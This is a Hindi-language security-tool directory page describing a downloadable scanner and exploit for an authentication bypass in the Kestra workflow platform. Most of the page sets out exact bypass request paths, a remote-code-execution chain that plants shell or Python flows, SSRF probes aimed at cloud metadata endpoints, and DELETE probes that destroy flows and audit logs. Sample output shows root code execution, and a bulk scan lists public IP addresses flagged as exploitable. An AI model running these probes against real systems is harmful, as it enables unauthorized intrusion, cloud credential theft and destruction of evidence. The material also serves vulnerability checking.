Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-49869 — Kestra Auth-Bypass भेद्यता जाँचक | Kitploit
उपकरण/GitHubGitHub/ap0dexme0/cve-2026-49869
भेद्यता स्कैनरशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरण
GitHubap0dexme0/cve-2026-49869

CVE-2026-49869

Kestra Auth-Bypass भेद्यता जाँचक

रिपॉजिटरी देखें
11 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Kestra CVE-2026-49869 / CVE-2026-53576 स्कैनर

Kestra इंस्टेंस को endsWith("/configs") प्रमाणीकरण फ़िल्टर बाईपास के लिए स्कैन करता है। Kestra का AuthenticationFilter.java सटीक पथ /api/v1/configs के मिलान के बजाय request.getPath().endsWith("/configs") की जाँच करता है। चूंकि Kestra संसाधनों को कॉलर-चयनित पथ खंडों (नेमस्पेस, फ्लो आईडी) के माध्यम से संबोधित करता है, /configs में समाप्त होने वाला कोई भी पथ बेसिक-प्रमाणीकरण को बायपास करता है जिससे अप्रमाणित फ्लो निर्माण और आरसीई संभव हो पाता है। (CVSS 10.0)

संदर्भ:

  • GHSA-5vc5-wxxq-3fjx
  • TP-2026-009
  • CVE-2026-49869 अनुचित प्रमाणीकरण / OS कमांड इंजेक्शन / अस्वीकृत इनपुटों की अपूर्ण सूची
  • CVE-2026-53576

पहचान तर्क

  1. जीवितता + संस्करण जाँच GET /api/v1/configs (200 लौटना चाहिए; Kestra संस्करण के लिए प्रतिक्रिया निकाय पार्स किया जाता है)
  2. प्रमाणीकरण जाँच GET /api/v1/{tenant}/flows (यदि प्रमाणीकरण लागू है तो 401/403 लौटना चाहिए)
  3. बाईपास प्रोब /configs में समाप्त होने वाले पथों पर 6 GET अनुरोध; यदि कोई भी 401/403 नहीं लौटाता है जबकि प्रमाणीकरण जाँच लागू होती है, तो इंस्टेंस असुरक्षित है
  4. आक्रामक मोड (--aggressive) लिखने-बाईपास क्षमता की पुष्टि करने के लिए PUT अनुरोध भी भेजता है
  5. आरसीई सत्यापन (--rce) पूर्ण श्रृंखला: शेल/पायथन फ्लो बनाएँ → निष्पादन ट्रिगर करें → लॉग प्राप्त करें → कोड निष्पादन की पुष्टि करें → सफाई करें
  6. SSRF पहचान (--ssrf) Pebble के http() का उपयोग करके AWS/GCP/Azure क्लाउड मेटाडेटा और आंतरिक एंडपॉइंट को लक्षित करने वाला एक फ्लो बनाता है, फिर सबूत के लिए लॉग की जाँच करता है
  7. DELETE प्रोब (--destructive) फ्लो, डैशबोर्ड और लॉग बाईपास पथों पर DELETE भेजता है ताकि विनाशकारी संचालन बाईपास की पुष्टि हो सके

प्रोब एंडपॉइंट्स

सुरक्षित प्रोब (डिफ़ॉल्ट)

आक्रामक प्रोब (--aggressive)

प्रोबविधिपथविवरण
फ्लो PUT बाईपास

विनाशकारी प्रोब (--destructive)

आरसीई सत्यापन श्रृंखला (--rce)

तभी चलता है जब प्रमाणीकरण बाईपास की पुष्टि हो। परामर्श से पूर्ण श्रृंखला:

SSRF पहचान श्रृंखला (--ssrf)

तभी चलता है जब प्रमाणीकरण बाईपास की पुष्टि हो:

CLI संदर्भ

root@kitploit:~
positional:
  target                          Single target URL (e.g. http://localhost:8080)

options:
  -f, --file                      File with targets (one per line)
  -t, --timeout                   Request timeout in seconds (default: 10)
  --verify-ssl                    Verify TLS certificates
  -j, --json                      Output JSON to stdout
  -o, --output                    Write JSON report to file
  --tenant                        Tenant name (default: "main")
  --namespace                     Namespace for bypass paths (default: "tutorial")
  -w, --workers                   Thread count for bulk scans (default: 10)
  -a, --aggressive                Send PUT requests to confirm write bypass
  -P, --auto-ports                Ports for auto-expand (default: 8080 8081 8088 8091 80 443)

advanced probes:
  -r, --rce                       Enable RCE verification chain (shell + python flow,
                                   execution trigger, log retrieval, auto-cleanup)
  -s, --ssrf                      Enable SSRF detection (Pebble http() to cloud metadata
                                   endpoints, log-based evidence collection)
  -d, --destructive               Enable DELETE probes on flows, dashboards, and logs
                                   (WILL delete resources on vulnerable instances)
  --poll-interval                 Seconds between log polls for RCE/SSRF chains (default: 3)
  --poll-retries                  Max log poll attempts for RCE/SSRF chains (default: 10)

आउटपुट

एकल लक्ष्य

प्रति-प्रोब विवरण संवर्धन (संस्करण, RCE, SSRF, DELETE स्थिति) और निर्णय के साथ:

root@kitploit:~
====================================================================
  Target:    http://10.0.0.1:8080
  Timestamp: 2026-06-30T12:00:00+00:00
====================================================================

  Version:      1.3.20 (AFFECTED)
  RCE:          CONFIRMED via shell
    | SCAN_RCE_a1b2c3d4e5f6
    | uid=0(root) gid=0(root) groups=0(root)
  SSRF:         DETECTED
    | Indicators found: ami-, 169.254.169.254, 127.0.0.1:8080
  DELETE BYPASS: CONFIRMED destructive ops bypass auth

  [Flows Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/flows/tutorial/configs
    Status:       200
    Bypass:      YES

  [Exec Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/executions/tutorial/configs
    Status:       404
    Bypass:      No

  ...

  ── RCE Verification Chain ──
    Flow Create: 201
    Exec Trigger: 201
    Log Evidence: 200
      > SCAN_RCE_a1b2c3d4e5f6
      > uid=0(root) gid=0(root) groups=0(root)
    Flow Cleanup: 204

  ── SSRF Detection Chain ──
    Flow Create: 201
    Exec Trigger: 201
    Evidence: 200
      Indicators found: ami-, 169.254.169.254, 127.0.0.1:8080
    Flow Cleanup: 204

  [VULN]  Verdict: VULNERABLE ...
====================================================================

बल्क सारांश

RCE/SSRF/DEL फ्लैग कॉलम के साथ क्रमबद्ध सारणीबद्ध तालिका:

root@kitploit:~
========================================================================================================================================
  BULK SCAN SUMMARY   GHSA-5vc5-wxxq-3fjx  |  CVE-2026-49869 / CVE-2026-53576
========================================================================================================================================
  #    Target                          Auth   Flows  Exec   KV     Dash   Logs   Tmpl   RCE    SSRF   DEL    Ver
  ---------------------------------------------------------------------------------------------------------------------------------------
  1    http://173.249.1.26:8080        401    404    ERR    ERR    ERR    405    404    YES    YES    YES    RCE!
  2    http://207.180.207.199:8080     401    404    ERR    ERR    ERR    405    404    INC    -      YES    VULN
  ...
  30   http://103.115.65.228:8080      401    401    ERR    401    ERR    401    401    -      -      -      SAFE
  ...
========================================================================================================================================
  Total: 258  |  Vulnerable: 5  |  RCE Confirmed: 1  |  SSRF Detected: 1  |  DEL Bypass: 2  |  Safe: 29  |  Inconclusive: 224
========================================================================================================================================

निकास कोड: 0 = कोई भेद्यता नहीं, 1 = भेद्यता मिली, 2 = सभी अनिर्णायक।

JSON रिपोर्ट

-j या -o का उपयोग करने पर, आउटपुट में प्रति लक्ष्य संवर्धन फ़ील्ड शामिल होते हैं:

root@kitploit:~
{
  "scan_info": {
    "scanner": "kestra_cve v2.0.0",
    "cve": ["CVE-2026-49869", "CVE-2026-53576"],
    "aggressive": true,
    "rce": true,
    "ssrf": true,
    "destructive": true
  },
  "results": [
    {
      "target": "http://10.0.0.1:8080",
      "vulnerable": true,
      "version": "1.3.20",
      "version_in_affected_range": true,
      "rce_confirmed": true,
      "rce_method": "shell",
      "rce_evidence": "SCAN_RCE_a1b2c3d4e5f6\nuid=0(root)",
      "ssrf_detected": true,
      "ssrf_evidence": "Indicators found: ami-, 169.254.169.254, 127.0.0.1:8080",
      "delete_bypass": true,
      "probes": { "..." : "..." }
    }
  ],
  "summary": {
    "total": 258,
    "vulnerable": 5,
    "rce_confirmed": 1,
    "ssrf_detected": 1,
    "delete_bypass": 2,
    "safe": 29,
    "inconclusive": 224
  }
}

संस्करण पहचान

स्कैनर स्वचालित रूप से GET /api/v1/configs प्रतिक्रिया से Kestra संस्करण निकालता है और इसे वर्गीकृत करता है:

यह शाखा-जागरूक तुलना का उपयोग करता है क्योंकि Kestra अलग-अलग पैच शाखाओं (1.0.x और 1.3.x) का रखरखाव करता है।

v1.0.0

  • सुरक्षित GET प्रोब, आक्रामक PUT प्रोब, बल्क स्कैनिंग और JSON आउटपुट के साथ प्रारंभिक रिलीज़

स्थापना

Python 3.10+ की आवश्यकता है।

root@kitploit:~
pip install -r requirements.txt
python main.py --help

अस्वीकरण

केवल अधिकृत रक्षात्मक परीक्षण के लिए। --rce और --destructive फ्लैग लक्ष्य पर वास्तविक संसाधन बनाते और निष्पादित करते हैं। उन सिस्टमों को स्कैन करने से पहले हमेशा उचित लिखित प्राधिकरण प्राप्त करें जिनके आप स्वामी नहीं हैं।

टूल डाउनलोड करें
प्रोबविधिपथविवरण
सार्वजनिक कॉन्फ़िगGET/api/v1/configsजीवितता जाँच + संस्करण निष्कर्षण
संरक्षित सामान्यGET/api/v1/{tenant}/flowsप्रमाणीकरण प्रवर्तन आधार रेखा
फ्लो बाईपासGET/api/v1/{tenant}/flows/{namespace}/configsफ्लो सूची बाईपास
निष्पादन बाईपासGET/api/v1/{tenant}/executions/{namespace}/configsनिष्पादन बाईपास
KV स्टोर बाईपासGET/api/v1/{tenant}/namespaces/{namespace}/kv/configsKV पढ़ने का बाईपास
डैशबोर्ड बाईपासGET/api/v1/{tenant}/dashboards/configsडैशबोर्ड बाईपास
लॉग बाईपासGET/api/v1/{tenant}/logs/{namespace}/configsलॉग एक्सेस बाईपास
टेम्पलेट बाईपासGET/api/v1/{tenant}/templates/{namespace}/configsटेम्पलेट पढ़ने का बाईपास
PUT
फ्लो बाईपास के समान
एक न्यूनतम debug.Return फ्लो बनाता है
KV PUT बाईपासPUTKV बाईपास के समानएक KV प्रविष्टि {"scanned": true} बनाता है
प्रोबविधिपथविवरण
फ्लो DELETE बाईपासDELETEफ्लो बाईपास के समान"configs" नामक संसाधन को हटाता है
डैशबोर्ड DELETE बाईपासDELETEडैशबोर्ड बाईपास के समान"configs" नामक डैशबोर्ड को हटाता है
लॉग DELETE बाईपासDELETEलॉग बाईपास के समानऑडिट लॉग नष्ट करता है
चरणविधिपथविवरण
1. RCE फ्लो बनाएँPUT/api/v1/{tenant}/flows/{namespace}/configsio.kestra.plugin.scripts.shell.Commands (echo <marker>, id, hostname) के साथ फ्लो तैनात करता है। विफलता पर io.kestra.plugin.scripts.python.Script पर वापस आ जाता है।
2. निष्पादन ट्रिगरPOST/api/v1/{tenant}/executions/{namespace}/configsबाईपास पथ के माध्यम से फ्लो शुरू करता है
3. लॉग पोल करेंGET/api/v1/{tenant}/logs/search?executionId=<id>अद्वितीय RCE मार्कर की तलाश में --poll-retries बार (डिफ़ॉल्ट 10) हर --poll-interval सेकंड (डिफ़ॉल्ट 3) पर पोल करता है
4. सफाईDELETEचरण 1 के समानतैनात फ्लो को हटाता है
चरणविधिपथविवरण
1. SSRF फ्लो बनाएँPUT/api/v1/{tenant}/flows/{namespace}/configsAWS (169.254.169.254/latest/meta-data/ami-id), GCP (metadata.google.internal), Azure (169.254.169.254/metadata/instance), और आंतरिक (127.0.0.1:8080/api/v1/configs) के लिए Pebble http() कॉल के साथ एक debug.Return कार्य तैनात करता है
2. निष्पादन ट्रिगरPOSTRCE चरण 2 के समानफ्लो ट्रिगर करता है
3. लॉग पोल करेंGET/api/v1/{tenant}/logs/search?executionId=<id>क्लाउड मेटाडेटा संकेतकों (ami-, i-, 169.254.169.254, metadata.google.internal, आदि) की जाँच करता है
4. सफाईDELETEचरण 1 के समानतैनात फ्लो को हटाता है
संस्करणवर्गीकरण
<= 1.0.44प्रभावित (1.0 शाखा, पैच से पहले)
>= 1.0.45पैच किया गया (1.0 शाखा)
1.3.0 1.3.20प्रभावित (1.3 शाखा, पैच से पहले)
>= 1.3.21पैच किया गया (1.3 शाखा)
>= 1.4.0पैच किया गया (प्रभावित सीमा से नया)
अज्ञातप्रतिक्रिया में संस्करण नहीं मिला